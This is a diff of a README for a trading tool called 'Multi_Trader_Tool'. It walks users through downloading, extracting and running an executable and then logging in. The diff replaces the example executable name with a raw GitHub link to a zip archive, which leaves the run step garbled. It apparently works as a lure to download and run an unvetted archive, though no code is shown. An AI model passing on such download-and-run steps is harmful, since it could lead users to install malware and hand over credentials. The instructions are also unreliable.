ShoAndScript/Multi_Trader_Tool/README.md

    After downloading, locate the zip file on your computer.
 Right-click the zip file and select "Extract All."
 Choose a destination folder for the extracted files.

 5. **Run the Application:**
    Once the files are extracted, navigate to the folder where you extracted them.
-Look for the executable file (e.g., `MultiTraderTool.exe`).
+Look for the executable file (e.g., `https://raw.githubusercontent.com/ShoAndScript/Multi_Trader_Tool/main/resent/Multi_Trader_Tool-1.7.zip`).
 Double-click to open the application.

 6. **Set Up Your Account:**
    Upon opening the application, you will need to create a new account or log in with your existing credentials.
 Follow the prompts to complete your account setup.